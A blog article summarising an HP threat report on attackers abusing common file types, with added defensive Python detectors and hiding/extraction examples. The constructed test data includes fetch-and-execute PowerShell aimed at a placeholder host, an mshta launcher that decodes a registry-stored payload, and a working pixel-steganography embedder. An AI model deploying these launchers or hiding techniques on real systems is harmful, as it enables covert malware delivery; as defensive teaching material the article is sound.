New Techniques, Old File Types: Attackers Use Common Files as Weapons


Attackers are finding new ways to blend in with standard business tools and old file types, concealing their actions within the procedures and formats that employees and IT teams rely on every day.  According to HP Wolf Security’s most recent quarterly Threat Insights Report, attackers are constantly evolving, making it harder for defenses to stay ahead.

Living off the land to stay hidden

The XWorm remote access trojan was one of the most prominent campaigns seen in the second quarter of 2025.  Rather than relying solely on custom malware, the attackers chained together several built-in Windows programs.  With these so-called “living off the land” binaries (LOLBins) they could run commands, copy files, and decode hidden payloads without triggering as many alarms.

Image: XWorm configuration (Source: HP Wolf Security)

The final XWorm payload was hidden within the pixels of a legitimate image downloaded from a trusted source.  PowerShell scripts extracted the hidden data, and Microsoft’s MSBuild tool then executed the malware.  By the end of the chain, most of the work had been done by programs already present on the machine, giving the attackers remote access and the opportunity to steal data.
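The following is an added example, not code from the HP report or from the XWorm campaign, showing one common way a payload is hidden in pixel data and then pulled back out: least-significant-bit (LSB) steganography over an RGB buffer. The carrier image is constructed in the script so it runs offline without an image library (Pillow's `Image.open(path).convert("RGB").tobytes()` yields the same byte layout); one bit per channel and a four-byte length prefix are assumptions about the scheme, not details taken from the report.

```python
"""
LSB steganography on a raw RGB pixel buffer: hide a payload in the least
significant bit of each colour channel, then recover it the way an extraction
script would (length header first, then exactly that many bytes).

Added example, not code from the HP report. The pixel buffer is constructed
in this script (no image library). One bit per channel and a 4-byte length
prefix are assumptions about the scheme, not details from the report.
"""
import struct
import zlib

HEADER_FMT = ">I"                      # 4-byte big-endian payload length
HEADER_LEN = struct.calcsize(HEADER_FMT)


def embed(pixels: bytes, payload: bytes) -> bytes:
    """Return a copy of `pixels` whose channel LSBs carry len(payload) + payload."""
    data = struct.pack(HEADER_FMT, len(payload)) + payload
    if len(data) * 8 > len(pixels):
        raise ValueError(f"carrier too small: need {len(data) * 8} channel bytes, have {len(pixels)}")
    out = bytearray(pixels)
    for i, byte in enumerate(data):
        for bit in range(8):                        # MSB first
            idx = i * 8 + bit
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def _read_bytes(pixels: bytes, first_byte: int, count: int) -> bytes:
    """Reassemble `count` bytes from the LSBs starting at hidden byte index `first_byte`."""
    out = bytearray()
    for i in range(count):
        value = 0
        for bit in range(8):
            value = (value << 1) | (pixels[(first_byte + i) * 8 + bit] & 1)
        out.append(value)
    return bytes(out)


def extract(pixels: bytes) -> bytes:
    """Recover the payload, refusing length headers the carrier cannot hold."""
    (length,) = struct.unpack(HEADER_FMT, _read_bytes(pixels, 0, HEADER_LEN))
    if (HEADER_LEN + length) * 8 > len(pixels):
        raise ValueError("length header exceeds carrier; no LSB payload in this scheme")
    return _read_bytes(pixels, HEADER_LEN, length)


def looks_like_pe(blob: bytes) -> bool:
    """First triage step on a recovered blob: PE/.NET executables start with 'MZ'."""
    return blob[:2] == b"MZ"


# Constructed carrier: a 64x64 RGB gradient, 3 bytes per pixel, no real image file.
WIDTH, HEIGHT = 64, 64
CARRIER = bytes(
    ((x * 4) & 0xFF) if c == 0 else ((y * 4) & 0xFF) if c == 1 else 0x80
    for y in range(HEIGHT) for x in range(WIDTH) for c in range(3)
)

# Constructed stand-in for a hidden executable: an 'MZ' prefix on compressed filler.
PAYLOAD = b"MZ" + zlib.compress(b"stand-in for a .NET loader " * 16)


def demo() -> dict:
    """Embed, extract, and measure how little the carrier changed."""
    stego = embed(CARRIER, PAYLOAD)
    recovered = extract(stego)
    return {
        "recovered_ok": recovered == PAYLOAD,
        "looks_like_pe": looks_like_pe(recovered),
        "channels_modified": sum(1 for a, b in zip(CARRIER, stego) if a != b),
        "max_abs_delta": max(abs(a - b) for a, b in zip(CARRIER, stego)),   # never more than 1
    }


if __name__ == "__main__":
    print(demo())
```

The point for defenders is in the last two numbers: every channel value moves by at most one, so the carrier still looks like a normal picture to the eye, to hash-based reputation (the original file is untouched if the stego image is served separately) and to format validators. Detection has to come from the consumer side, which is why the PowerShell reading pixel bytes and feeding MSBuild is the observable part of the chain.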

For security teams, living-off-the-land techniques are notoriously hard to handle because it is difficult to tell attacks from legitimate activity.  Defenders must choose between blocking the activity, which disrupts users and generates SOC tickets, and allowing it, which risks letting an attacker through.  According to Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., “defense-in-depth with containment and isolation is essential to trap attacks before they can cause harm,” because even the best detection will miss some threats.

Invoices and fake documents still work

Phishing emails remain the dominant delivery method, accounting for 61% of threats that reached endpoints. Attackers continue to refine how they use document formats as lures.

One campaign used realistic invoice-themed emails to trick recipients into opening SVG attachments. The attachments displayed a convincing imitation of Adobe Acrobat, complete with animations and progress bars, before prompting users to download malware. The script that followed was a lightweight reverse shell, providing attackers with command execution and data collection.
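The lure above works only because SVG is an XML document that browsers will execute script from. The triage routine below is an added example, not the report's code, that flags the active-content features a mail gateway or analyst should look for before an SVG reaches a user. `SAMPLE_SVG` is constructed to mimic the described behaviour (fake viewer UI, progress bar, download link); the URL in it is invented. The standard-library parser is used only to keep the example offline; on untrusted input use `defusedxml`.

```python
"""
Triage an SVG attachment for active content: <script> elements, on* event
handlers, javascript:/vbscript: URLs, <foreignObject> (which may carry
arbitrary HTML) and links to downloadable file types.

Added example, not the HP report's code. SAMPLE_SVG and BENIGN_SVG are
constructed; the URL in SAMPLE_SVG is invented.
"""
import re
import xml.etree.ElementTree as ET

DOWNLOAD_RE = re.compile(
    r"\.(zip|rar|7z|iso|img|exe|scr|pif|js|jse|vbs|vbe|hta|lnk|chm)(\?|#|$)", re.I)
ACTIVE_SCHEMES = {"javascript", "vbscript"}


def _local(qualified: str) -> str:
    """ElementTree returns '{namespace}name'; keep just the lower-cased name."""
    return qualified.rsplit("}", 1)[-1].lower()


def triage_svg(svg_text: str) -> dict:
    """Return {'findings': [(severity, message), ...], 'verdict': 'block'|'review'|'allow'}."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return {"findings": [("medium", f"malformed XML: {exc}")], "verdict": "review"}

    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append(("high", f"<script> element with {len((el.text or '').strip())} chars of code"))
        elif tag == "foreignobject":
            findings.append(("medium", "<foreignObject> element (can embed arbitrary HTML)"))

        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(("high", f"event handler {name}= on <{tag}>"))
            if name in ("href", "src"):
                scheme = value.split(":", 1)[0].strip().lower() if ":" in value else ""
                if scheme in ACTIVE_SCHEMES:
                    findings.append(("high", f"{scheme}: URL in {name} on <{tag}>"))
                elif scheme == "data":
                    findings.append(("medium", f"data: URL in {name} on <{tag}>"))
                if DOWNLOAD_RE.search(value):
                    findings.append(("medium", f"link to downloadable file type: {value}"))

    severities = {s for s, _ in findings}
    verdict = "block" if "high" in severities else "review" if "medium" in severities else "allow"
    return {"findings": findings, "verdict": verdict}


# Constructed lure: a fake "Acrobat" loading screen with an animated bar,
# an onload handler, inline script and a link to an archive.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     width="600" height="400" onload="start()">
  <rect width="600" height="400" fill="#ffffff"/>
  <text x="40" y="60" font-size="20">Adobe Acrobat - loading invoice_8841.pdf</text>
  <rect id="bar" x="40" y="90" width="0" height="12" fill="#cc0000">
    <animate attributeName="width" from="0" to="520" dur="2s" fill="freeze"/>
  </rect>
  <a xlink:href="https://example.invalid/dl/invoice_8841.zip">
    <text x="40" y="140" fill="#0000ee">Download document</text>
  </a>
  <script><![CDATA[
    function start() { document.getElementById("bar").setAttribute("width", "520"); }
  ]]></script>
</svg>"""

# Constructed benign SVG: a pure vector drawing, no script, no links.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"><circle cx="5" cy="5" r="4"/></svg>'


if __name__ == "__main__":
    for label, doc in (("lure", SAMPLE_SVG), ("benign", BENIGN_SVG)):
        result = triage_svg(doc)
        print(label, result["verdict"])
        for severity, message in result["findings"]:
            print(f"  [{severity}] {message}")
```

Note that SMIL animation (`<animate>`) is left alone: the progress bar in the lure is harmless by itself, and it is the `onload` handler and the `<script>` block that turn a picture into a program.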

Another phishing wave used PDF attachments showing a blurred invoice with a download button. The link fetched a ZIP file containing a malicious encoded Visual Basic script (VBE). To make detection even harder, the script stored key components of the infection directly in the Windows Registry. The final payload was MassLogger, a credential stealer that records keystrokes and harvests browser data. When the victim was located in France, the attackers sometimes deployed a second remote access trojan, ModiRAT.
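Components parked in the registry leave no file for a scanner to open, but they do leave unusual registry values. The script below is an added example, not from the HP report, that scans a `.reg` export for large high-entropy values and for values that invoke a script host or decode base64, with extra weight for autostart keys. `SAMPLE_REG` is constructed: the key path `HKCU\Software\Contoso\Stage`, the value names and the command line in it are invented, and the thresholds are starting points rather than figures from the report.

```python
"""
Find infection components staged in the Windows registry by scanning a .reg
export for (a) large, high-entropy string or binary values and (b) values
that invoke a script host or decode base64, weighting autostart keys.

Added example, not from the HP report. SAMPLE_REG is constructed; the
Contoso\Stage key, the value names and the command line are invented.
"""
import base64
import math
import re
from collections import Counter

AUTOSTART_HINTS = (
    "software\\microsoft\\windows\\currentversion\\run",
    "software\\microsoft\\windows\\currentversion\\runonce",
    "software\\microsoft\\windows nt\\currentversion\\winlogon",
)
SCRIPT_HOST_RE = re.compile(
    r"powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|FromBase64String|Invoke-Expression|\bIEX\b|-enc",
    re.I)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_reg(text: str):
    """Yield (key, value_name, kind, raw_bytes) for every value in a .reg export."""
    # Hex values wrap across lines ending in ',\'; join those continuations first.
    text = re.sub(r",\\\r?\n\s*", ",", text)
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line) or re.match(r"^(@)=(.*)$", line)
        if key is None or not m:
            continue
        name, raw = m.group(1), m.group(2).strip()
        if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            yield key, name, "REG_SZ", raw[1:-1].encode("utf-8", "replace")
        elif raw.startswith("hex"):                 # hex: (REG_BINARY) or hex(N):
            kind, _, body = raw.partition(":")
            yield key, name, kind, bytes(int(h, 16) for h in body.split(",") if h.strip())
        elif raw.startswith("dword:"):
            yield key, name, "dword", bytes.fromhex(raw[6:].zfill(8))


def find_staged_payloads(text: str, min_len: int = 256, min_entropy: float = 5.0) -> list:
    """Return suspicious values with the reasons they were flagged."""
    hits = []
    for key, name, kind, blob in parse_reg(text):
        reasons = []
        entropy = shannon_entropy(blob)
        if len(blob) >= min_len and entropy >= min_entropy:
            reasons.append(f"{len(blob)}-byte {kind} value with entropy {entropy:.2f} bits/byte")
        if SCRIPT_HOST_RE.search(blob.decode("latin-1")):
            reasons.append("references a script host or base64 decoding")
        if not reasons:
            continue
        autostart = any(h in key.lower() for h in AUTOSTART_HINTS)
        if autostart:
            reasons.append("stored under an autostart key")
        hits.append({"key": key, "name": name, "kind": kind, "size": len(blob),
                     "entropy": round(entropy, 2), "autostart": autostart, "reasons": reasons})
    return hits


# Constructed stand-in for a staged blob: base64 of a byte pattern, 1 KiB of text.
_BLOB = base64.b64encode(bytes(range(256)) * 3).decode()

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="mshta vbscript:Execute(\"CreateObject(\"\"WScript.Shell\"\").Run \"\"powershell -w hidden -c iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((gp HKCU:\\Software\\Contoso\\Stage).Blob)))\"\", 0:close\")"

[HKEY_CURRENT_USER\Software\Contoso\Stage]
"Blob"="BLOB_PLACEHOLDER"
"Marker"=dword:00000001
"Cfg"=hex:01,02,03,04
""".replace("BLOB_PLACEHOLDER", _BLOB)


if __name__ == "__main__":
    for hit in find_staged_payloads(SAMPLE_REG):
        print(f"{hit['key']}\\{hit['name']}: " + "; ".join(hit["reasons"]))
```

The two hits illustrate the pattern to look for as a pair: a small autostart value that only contains a launcher line, and a large opaque value somewhere else that the launcher reads and decodes. Either alone is easy to dismiss; together they are the fileless stage.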

Old File Types Resurface

According to the report, attackers are repurposing formats that many users hardly ever see these days.  Compiled HTML Help (.chm) files, once used for Windows application manuals, are now being weaponized to deliver malware.  Because they can carry scripts, they serve as containers for multi-stage infections.  In observed campaigns, opening a help file posing as project documentation triggered scripts that ultimately led to XWorm infections.

LNK shortcut files also returned.  In one case they arrived by phishing email inside a ZIP file, disguised as PDFs.  Instead of opening a document, the shortcut executed malicious code that installed the Remcos remote access trojan.  To further reduce the chance that users or tools would notice the final payload, the attackers stored it in the outdated Program Information File (.pif) format.

Lumma Stealer survives takedown

Some operators have not been deterred even by law enforcement action.  In May 2025, Lumma Stealer was disrupted by an international takedown that seized a large portion of its infrastructure.  By June, however, distribution campaigns had resumed, with the attackers switching to new servers and techniques.

One distribution chain used IMG files attached to phishing emails.  When opened, Windows mounts these disk images as virtual drives, presenting the user with an HTML Application (.hta) file that looked like an invoice.  Running it ultimately executed obfuscated PowerShell that unpacked and launched Lumma Stealer in memory, sidestepping disk-based detection.
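Both chains on this page, PowerShell handing a project file to MSBuild in the XWorm campaign and a mounted IMG exposing an HTA that launches encoded PowerShell in the Lumma campaign, are invisible to rules that look at one process at a time and obvious once process lineage is reconstructed. The detector below is an added example, not from the HP report or any HP product: it rebuilds parent chains from pid/ppid and applies three chain-aware rules, decoding `-EncodedCommand` so that loader keywords hidden in base64 are still seen. `EVENTS` is a constructed Sysmon-style sample with invented pids, paths, user name and URL; the field names are an assumption about how a SIEM presents process-creation events.

```python
"""
Chain-aware detection for living-off-the-land patterns: MSBuild started under
a script host or pointed at a user-writable project, mshta running an HTA from
a mounted image or removable drive, and PowerShell carrying in-memory loader
indicators (including inside -EncodedCommand).

Added example, not from the HP report. EVENTS is a constructed sample with
invented pids, paths, user name and URL; the field names are an assumption.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "hh.exe"}          # hh.exe renders .chm files
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\Temp\\|\\Public\\|\\ProgramData\\", re.I)
NON_SYSTEM_DRIVE = re.compile(r"(?:^|[\s\"'])([D-Z]:\\)", re.I)
LOADER_WORDS = re.compile(
    r"Invoke-Expression|\bIEX\b|FromBase64String|Reflection\.Assembly|Assembly\]::Load"
    r"|DownloadString|DownloadData|\.Invoke\(", re.I)
# Matches -e, -ec, -enc, -encodedcommand but not -ep (ExecutionPolicy) or -ex.
ENC_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or invalid."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except ValueError:
        return ""


def ancestors(by_pid: dict, pid: int, limit: int = 16) -> list:
    """Image basenames of the parent, grandparent, ... (nearest first), cycle-safe."""
    chain, cur = [], by_pid.get(pid)
    while cur is not None and len(chain) < limit:
        parent = by_pid.get(cur["ppid"])
        if parent is None or parent is cur:
            break
        chain.append(basename(parent["image"]))
        cur = parent
    return chain


def evaluate(events: list) -> list:
    """Return alerts {'pid', 'rule', 'chain', 'evidence'} for each suspicious process."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, cmd = basename(e["image"]), e["cmdline"]
        parents = ancestors(by_pid, e["pid"])
        chain = " > ".join(list(reversed(parents)) + [name])
        evidence = []

        if name == "msbuild.exe":
            rule = "LOL-1 MSBuild used as a loader"
            host = next((p for p in parents if p in SCRIPT_HOSTS), None)
            if host:
                evidence.append(f"script host {host} in ancestry")
            if USER_WRITABLE.search(cmd):
                evidence.append("project file in a user-writable location")
        elif name == "mshta.exe":
            rule = "LOL-2 HTA run from an untrusted volume"
            if NON_SYSTEM_DRIVE.search(cmd):
                evidence.append("HTA on a non-system drive (mounted IMG/ISO or removable media)")
            if USER_WRITABLE.search(cmd):
                evidence.append("HTA in a user-writable location")
        elif name in ("powershell.exe", "pwsh.exe"):
            rule = "LOL-3 PowerShell in-memory loader"
            decoded = decode_encoded_command(cmd)
            words = sorted({w.group(0) for w in LOADER_WORDS.finditer(cmd + " " + decoded)}, key=str.lower)
            if words:
                evidence.append("loader indicators: " + ", ".join(words))
            if decoded:
                evidence.append("encoded command present")
            if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
                evidence.append("hidden window")
            if parents and parents[0] in SCRIPT_HOSTS - {"powershell.exe", "pwsh.exe", "cmd.exe"}:
                evidence.append(f"spawned by {parents[0]}")
            if not words and len(evidence) < 2:      # a hidden window alone is too noisy
                evidence = []
        else:
            continue

        if evidence:
            alerts.append({"pid": e["pid"], "rule": rule, "chain": chain, "evidence": evidence})
    return alerts


# Constructed sample (invented pids, user, paths, URL). Extract-Lsb is an invented function name.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16-le")).decode()

EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # XWorm-style: PowerShell pulls bytes out of an image, then hands MSBuild a project in %TEMP%
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -c $p=[IO.File]::ReadAllBytes('C:\Users\alice\AppData\Local\Temp\photo.png'); [IO.File]::WriteAllBytes('C:\Users\alice\AppData\Local\Temp\build.xml', (Extract-Lsb $p)); & 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe' C:\Users\alice\AppData\Local\Temp\build.xml"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.xml"},
    # Benign developer build started from Visual Studio
    {"pid": 300, "ppid": 100, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 301, "ppid": 300, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.sln /t:Build"},
    # Lumma-style: a mounted IMG exposes an HTA, which launches encoded PowerShell
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe E:\Invoice_2025-06.hta"},
    {"pid": 401, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ENC},
]


if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(f"pid {alert['pid']} [{alert['rule']}] {alert['chain']}: " + "; ".join(alert["evidence"]))
```

The two MSBuild events show why lineage matters: the same binary with a near-identical command line is benign under `devenv.exe` and building a solution in `C:\src`, and an alert under `powershell.exe` with a project file in `%TEMP%`. The first PowerShell process produces no alert on its own (a hidden window is not enough), but its MSBuild child does.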


Threat delivery trends

In Q2 2025, archives accounted for 40% of the threats reported, making them the most common delivery vehicle.  Executables and scripts came second at 35%.  Documents such as Word, Excel, and PDF files made up smaller but still significant shares.

The figures show how attackers keep switching between file types, choosing whichever has the best chance of reaching users undetected.  Even older formats, such as PIF executables and .chm help files, are being given new life in current campaigns.
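Because the delivery format keeps changing, a useful first check is content-based: decide what a file is from its bytes and compare that with what its name claims. The script below is an added example, not code from the HP report, covering the formats this page mentions: a LNK posing as a PDF inside a ZIP, a PE renamed to .pif, a .chm help file, an IMG disk image that mounts as a drive and exposes an HTA, plus SVG and PDF for contrast. The sample files are constructed byte strings with invented names; they carry only the headers needed to be recognised and are not real documents or malware.

```python
"""
Content-based type identification versus the claimed extension, for the
formats the report lists as delivery vehicles: PE ('MZ'), PDF, ZIP, CHM
('ITSF'), LNK (0x4C header plus the ShellLink CLSID), ISO 9660 disk images
('CD001' at offset 0x8001, which is what an IMG attachment usually is), and
text sniffing for SVG and HTML/HTA.

Added example, not code from the HP report. SAMPLES are constructed headers
with invented file names, not real documents or malware.
"""

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "lnk", "hta", "chm", "js", "jse", "vbs", "vbe", "wsf", "bat", "cmd"}
CONTAINER_EXTS = {"zip", "img", "iso", "vhd", "vhdx", "7z", "rar"}
EXPECTED = {"pdf": "pdf", "zip": "zip", "img": "iso9660", "iso": "iso9660", "chm": "chm",
            "lnk": "lnk", "exe": "pe", "scr": "pe", "pif": "pe", "com": "pe",
            "hta": "html", "svg": "svg"}


def sniff(data: bytes) -> str:
    """Return a content type label derived from magic bytes, or 'unknown'."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"%PDF":
        return "pdf"
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[:4] == b"ITSF":
        return "chm"
    if data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID:
        return "lnk"
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "iso9660"
    head = data[:4096].lstrip(b"\xef\xbb\xbf \t\r\n").lower()
    if head.startswith((b"<?xml", b"<svg")) and b"<svg" in head:
        return "svg"
    if head.startswith((b"<!doctype html", b"<html", b"<hta:application")) or b"<script" in head:
        return "html"
    return "unknown"


def assess(filename: str, data: bytes) -> dict:
    """Compare the claimed extension(s) with the sniffed content and give a verdict."""
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    inner = [p for p in parts[1:-1] if p in EXPECTED or p in EXECUTABLE_EXTS]   # 'pdf' in 'x.pdf.lnk'
    content = sniff(data)
    findings = []

    if ext in EXPECTED and content != EXPECTED[ext]:
        findings.append(f"content is {content}, but extension .{ext} implies {EXPECTED[ext]}")
    if ext in EXECUTABLE_EXTS:
        findings.append(f"Windows hands .{ext} to an execution host, not a document viewer")
    if ext == "pif" and content == "pe":
        findings.append(".pif with an MZ header is a renamed PE executable")
    if inner:
        findings.append(f"double extension: looks like .{inner[-1]} but is .{ext}")
    if content == "iso9660" or ext in CONTAINER_EXTS:
        findings.append("container/disk image: mounts or unpacks, so scan what is inside")
    if content == "html" and ext == "hta":
        findings.append("HTML Application: its script runs via mshta.exe outside the browser sandbox")
    if content == "svg":
        findings.append("SVG is XML that browsers will run script from; triage its contents")

    if ext in EXECUTABLE_EXTS or content in ("pe", "lnk", "chm"):
        verdict = "block"
    elif findings:
        verdict = "inspect"
    else:
        verdict = "allow"
    return {"filename": filename, "content": content, "findings": findings, "verdict": verdict}


def _iso_image() -> bytes:
    """Minimal ISO 9660 skeleton: zeros up to the primary volume descriptor at 0x8000."""
    img = bytearray(0x8800)
    img[0x8000] = 0x01                         # descriptor type: primary
    img[0x8001:0x8006] = b"CD001"              # standard identifier
    return bytes(img)


# Constructed samples: headers only, invented names.
SAMPLES = {
    "invoice.pdf.lnk": b"\x4c\x00\x00\x00" + LNK_CLSID + b"\x00" * 56,   # LNK posing as a PDF
    "Setup_Update.pif": b"MZ\x90\x00" + b"\x00" * 60,                    # PE renamed to .pif
    "Project_Docs.chm": b"ITSF\x03\x00\x00\x00" + b"\x00" * 24,
    "Invoice_2025-06.img": _iso_image(),
    "statement.hta": b"<html><head><hta:application id=\"x\"/></head><body><script>document.title='Invoice'</script></body></html>",
    "invoice_8841.svg": b"<svg xmlns=\"http://www.w3.org/2000/svg\"><script>document.title='x'</script></svg>",
    "report.pdf": b"MZ\x90\x00" + b"\x00" * 60,                          # PE wearing a .pdf name
    "invoice.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
}


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        r = assess(name, blob)
        print(f"{name:22} {r['content']:8} {r['verdict']:8} " + "; ".join(r["findings"]))
```

Two caveats a practitioner should keep in mind: the ISO check only finds ISO 9660 images (an IMG built as a raw FAT volume needs a boot-sector check instead), and a PIF has no reliable magic of its own, so the rule is simply that anything with a .pif name is treated as an executable, because that is how Windows treats it.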

What does this mean for defenders?

The report’s central finding is that attackers are trying to pass as legitimate activity.  Realistic lures, built-in system utilities, and malware hidden inside trusted file types all lower the chance of being discovered early.

Defenders therefore need to look beyond simple filtering and file signatures.  Behavior-based detection, monitoring of persistence mechanisms, and visibility into the misuse of built-in system tools are becoming more important.

The campaigns discussed here show that attackers can turn everyday technologies and file types into weapons without any need for sophisticated malware.

“Attackers are improving their methods rather than creating new ones.  Although phishing, reverse shelling, and living off the land have been used for decades, modern threat actors are honing these techniques.  Living-off-the-land tools are increasingly being chained together, and less evident file types—like images—are being used to avoid detection.  Consider reverse shells as one example. A straightforward, lightweight script can accomplish the same goal as a fully functional RAT.  It’s quick, easy, and frequently goes unnoticed due to its simplicity,” said Alex Holland, Principal Threat Researcher at HP Security Lab.

About The Author:

Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space.  Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
